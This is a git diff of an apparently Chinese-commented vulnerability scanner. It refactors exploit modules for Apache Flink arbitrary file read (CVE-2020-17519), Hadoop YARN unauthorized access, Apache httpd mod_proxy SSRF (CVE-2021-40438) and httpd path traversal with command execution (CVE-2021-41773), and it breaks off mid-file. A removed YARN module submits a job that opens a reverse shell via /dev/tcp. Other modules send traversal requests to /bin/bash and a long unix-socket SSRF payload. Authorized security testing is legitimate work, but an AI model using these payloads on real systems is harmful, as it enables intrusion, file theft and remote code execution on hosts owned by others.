-def cve_2020_17519_scan(clients):
-    ''' Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)
-            允许攻击者通过JobManager进程的REST接口, 读取JobManager本地文件系统上的任意文件 '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'ApacheFlink',
-        'vul_type': 'FileRead',
-        'vul_id': 'CVE-2020-17519',
-    }
-
-    for payload in cve_2020_17519_payloads:         # * Payload
-        path = payload['path']                      # * Path
-
-        res = client.request(
-            'get',
-            path,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (check.check_res_fileread(res.text)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/ApacheFlink/main.py b/payloads/ApacheFlink/main.py
deleted file mode 100644
index 7e4f1be..0000000
--- a/payloads/ApacheFlink/main.py
+++ /dev/null
@@ -1,28 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-    ApacheFlink扫描类: 
-        Flink 任意文件读取
-            CVE-2020-17519
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.ApacheFlink.cve_2020_17519 import cve_2020_17519_scan
-
-class Flink():
-    def __init__(self):
-        self.app_name = 'ApacheFlink'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2020_17519_scan, clients=clients)
-        ]
-
-flink = Flink()
\ No newline at end of file
diff --git a/payloads/ApacheHadoop/apache-hadoop-unauth.py b/payloads/ApacheHadoop/apache-hadoop-unauth.py
new file mode 100644
index 0000000..29be8c9
--- /dev/null
+++ b/payloads/ApacheHadoop/apache-hadoop-unauth.py
@@ -0,0 +1,73 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Hadoop YARN ResourceManager 未授权访问
+    暂无编号
+        Payload: https://vulhub.org/#/environments/hadoop/unauthorized-yarn/
+
+YARN默认开放REST API, 允许用户直接通过API进行相关的应用创建、任务提交执行等操作, 
+    如果配置不当, 将会导致REST API未授权访问, 攻击者可利用其执行远程命令
+'''
+
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': ''},
+            {'path': 'cluster'},
+            {'path': 'cluster/cluster'},
+            {'path': 'cluster/nodes'},
+            {'path': 'cluster/nodelabels'},
+            {'path': 'cluster/apps'},
+            {'path': 'cluster/scheduler'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+    
+        vul_info = {
+            'app_name': 'ApacheHadoop',
+            'vul_type': 'unAuthorized',
+            'vul_id': 'ApacheHadoop-unAuth',
+        }
+        
+        for payload in self.payloads:
+            path = payload['path']
+
+            res = client.request(
+                'get',
+                path,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if ((
+                    'parseHadoopID' in res.text
+                    and 'renderHadoopDate' in res.text
+                    and 'parseHadoopProgress' in res.text)
+                or (
+                    'src="/static/hadoop-st.png"' in res.text
+                    and 'href="/jmx?qry=Hadoop:*"' in res.text
+                    and 'org.apache.hadoop.yarn.server.resourcemanager' in res.text
+                    and 'Hadoop version' in res.text)
+                or (
+                    '<img src="/static/hadoop-st.png">' in res.text
+                    and '<a href="/jmx?qry=Hadoop:*">Server metrics</a>' in res.text)
+            ):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Exploit': 'https://github.com/vulhub/vulhub/blob/master/hadoop/unauthorized-yarn/exploit.py',
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/ApacheHadoop/main.py b/payloads/ApacheHadoop/main.py
deleted file mode 100644
index af9e29c..0000000
--- a/payloads/ApacheHadoop/main.py
+++ /dev/null
@@ -1,30 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-
-    Apache Hadoop扫描类: 
-        Hadoop YARN ResourceManager 未授权访问
-            暂无编号
-                Payload: https://vulhub.org/#/environments/hadoop/unauthorized-yarn/
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.ApacheHadoop.new_unauth import unauth_scan
-
-class ApacheHadoop():
-    def __init__(self):
-        self.app_name = 'ApacheHadoop'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=unauth_scan, clients=clients)
-        ]
-
-hadoop = ApacheHadoop()
diff --git a/payloads/ApacheHadoop/new_unauth.py b/payloads/ApacheHadoop/new_unauth.py
deleted file mode 100644
index 25326ab..0000000
--- a/payloads/ApacheHadoop/new_unauth.py
+++ /dev/null
@@ -1,57 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-unauth_payloads = [
-    {'path': ''},
-    {'path': 'cluster'},
-    {'path': 'cluster/cluster'},
-    {'path': 'cluster/nodes'},
-    {'path': 'cluster/nodelabels'},
-    {'path': 'cluster/apps'},
-    {'path': 'cluster/scheduler'},
-]
-
-def unauth_scan(clients):
-    ''' YARN默认开放REST API, 允许用户直接通过API进行相关的应用创建、任务提交执行等操作, 
-        如果配置不当, 将会导致REST API未授权访问, 攻击者可利用其执行远程命令
-    '''
-    client = clients.get('reqClient')
-
-    vul_info = {
-        'app_name': 'ApacheHadoop',
-        'vul_type': 'unAuthorized',
-        'vul_id': 'ApacheHadoop-unAuth',
-    }
-    
-    for payload in unauth_payloads:
-        path = payload['path']
-
-        res = client.request(
-            'get',
-            path,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if ((
-                'parseHadoopID' in res.text
-                and 'renderHadoopDate' in res.text
-                and 'parseHadoopProgress' in res.text)
-            or (
-                'src="/static/hadoop-st.png"' in res.text
-                and 'href="/jmx?qry=Hadoop:*"' in res.text
-                and 'org.apache.hadoop.yarn.server.resourcemanager' in res.text
-                and 'Hadoop version' in res.text)
-            or (
-                '<img src="/static/hadoop-st.png">' in res.text
-                and '<a href="/jmx?qry=Hadoop:*">Server metrics</a>' in res.text)
-        ):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Exploit': 'https://github.com/vulhub/vulhub/blob/master/hadoop/unauthorized-yarn/exploit.py',
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/ApacheHadoop/old_unauth.py b/payloads/ApacheHadoop/old_unauth.py
deleted file mode 100644
index 4c65ac6..0000000
--- a/payloads/ApacheHadoop/old_unauth.py
+++ /dev/null
@@ -1,99 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-unauthorized_payloads = [
-    {
-        'path': 'ws/v1/cluster/apps/new-application',
-        'data': ''
-    },
-    # {
-    #     'path': 'ws/v1/cluster/apps',
-    #     'data': {
-    #         'application-id': '',
-    #         'application-name': 'mouse',
-    #         'am-container-spec': {
-    #             'commands': {
-    #                 'command': 'curl DNSdomain',          # * ping或curl无效, 放弃
-    #             },
-    #         },
-    #         'application-type': 'YARN',
-    #     }
-    # },
-    {
-        'path': 'ws/v1/cluster/apps',
-        'data': {
-            'application-id': '',
-            'application-name': 'mouse',
-            'am-container-spec': {
-                'commands': {
-                    'command': '/bin/bash >& /dev/tcp/ip/port 0>&1',
-                },
-            },
-            'application-type': 'YARN',
-        }
-    },
-]
-
-def apache_hadoop_unauthorized_scan(self, clients):
-    ''' YARN默认开放REST API, 允许用户直接通过API进行相关的应用创建、任务提交执行等操作, 
-        如果配置不当, 将会导致REST API未授权访问, 攻击者可利用其执行远程命令
-    '''
-    # sessid = '3861eb6b3d023d464efe85aa01277d27'
-    client = clients.get('reqClient')
-
-    vul_info = {
-        'app_name': 'ApacheHadoop',
-        'vul_type': 'unAuthorized',
-        'vul_id': 'ApacheHadoop-unAuth',
-    }
-    
-    headers = {
-        'Content-Type': 'application/json'
-    }
-
-    for payload in range(len(unauthorized_payloads)):
-        # md = random_md5()                                       # * 随机md5值, 8位
-        # dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
-
-        path = unauthorized_payloads[payload]['path']
-        data = unauthorized_payloads[payload]['data']
-
-        if (payload == 0):                                        # * 获取application-id
-            res1 = client.request(
-                'post',
-                path,
-                data=data,
-                headers=headers,
-                allow_redirects=False,
-                vul_info=vul_info
-            )
-
-            try:
-                if (res1.json()['application-id']):
-                    self.application_id = res1.json()['application-id']
-                    continue
-            except:
-                return None
-
-        # command = data['am-container-spec']['commands']['command']
-        # data['am-container-spec']['commands']['command'] = command.replace('DNSdomain', dns_domain)
-        data['application-id'] = self.application_id
-
-        res2 = client.request(
-            'post',
-            json=data,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res2 is None:
-            continue
-
-        if (res2.status_code == 202):
-            results = {
-                'Target': res2.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res2
-            }
-            return results
-    return None
diff --git a/payloads/ApacheHttpd/cve_2021_40438.py b/payloads/ApacheHttpd/apache-httpd-cve-2021-40438-ssrf.py
similarity index 71%
rename from payloads/ApacheHttpd/cve_2021_40438.py
rename to payloads/ApacheHttpd/apache-httpd-cve-2021-40438-ssrf.py
index 5d7e047..c815994 100644
--- a/payloads/ApacheHttpd/cve_2021_40438.py
+++ b/payloads/ApacheHttpd/apache-httpd-cve-2021-40438-ssrf.py
@@ -1,45 +1,59 @@
 #!/usr/bin/env python3
 # -*- coding:utf-8 -*-
 
-# from lib.tool import check
-
-cve_2021_40438_payloads = [
-    {
-        'path': '?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://example.com/',
-    },
-]
-
-def cve_2021_40438_scan(clients):
-    ''' httpd的mod_proxy存在服务器端请求伪造(SSRF)
-        该漏洞允许未经身份验证的远程攻击者使 httpd 服务器将请求转发到任意服务器
-    '''
-    hackClient = clients.get('hackClient')
+'''
+Apache httpd 2.4.48 mod_proxy SSRF
+    CVE-2021-40438
+        Payload: https://vulhub.org/#/environments/httpd/CVE-2021-40438/
+
+httpd的mod_proxy存在服务器端请求伪造(SSRF)
+    该漏洞允许未经身份验证的远程攻击者使 httpd 服务器将请求转发到任意服务器
+'''
+
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': '?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://example.com/',
+            },
+        ]
+    
+    def POC(self, clients):
+        hackClient = clients.get('hackClient')
+        
+        vul_info = {
+            'app_name': 'ApacheHttpd',
+            'vul_type': 'SSRF',
+            'vul_id': 'CVE-2021-40438',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+
+            res = hackClient.request(
+                'get',
+                path,
+                location=True,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (('This domain is for use in illustrative examples in documents.' in res.text)
+                and ('domain in literature without prior coordination or asking for permission.' in res.text)
+            ):
+                results = {
+                    'Target': res.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
     
-    vul_info = {
-        'app_name': 'ApacheHttpd',
-        'vul_type': 'SSRF',
-        'vul_id': 'CVE-2021-40438',
-    }
-
-    for payload in cve_2021_40438_payloads:
-        path = payload['path']
-
-        res = hackClient.request(
-            'get',
-            path,
-            location=True,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (('This domain is for use in illustrative examples in documents.' in res.text)
-            and ('domain in literature without prior coordination or asking for permission.' in res.text)
-        ):
-            results = {
-                'Target': res.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/ApacheHttpd/apache-httpd-cve-2021-41773-rce-fileread.py b/payloads/ApacheHttpd/apache-httpd-cve-2021-41773-rce-fileread.py
new file mode 100644
index 0000000..46ba8cf
--- /dev/null
+++ b/payloads/ApacheHttpd/apache-httpd-cve-2021-41773-rce-fileread.py
@@ -0,0 +1,114 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Apache httpd 2.4.49 路径遍历
+    CVE-2021-41773
+        Payload: https://vulhub.org/#/environments/httpd/CVE-2021-41773/
+        Paylaod: https://github.com/thehackersbrain/CVE-2021-41773/blob/main/exploit.py
+
+在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷,
+    攻击者可以使用路径遍历攻击将URL映射到网站根目录预期之外的文件
+        在特定情况下, 攻击者可构造恶意请求执行系统命令
+'''
+
+from PluginManager import Vuln_Scan
+from lib.tool.md5 import random_md5
+from lib.tool import check
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash',
+                'data': 'echo Content-Type: text/plain; echo; {RCECOMMAND}'
+            },
+            {
+                'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash',
+                'data': 'echo;{RCECOMMAND}'
+            },
+            {
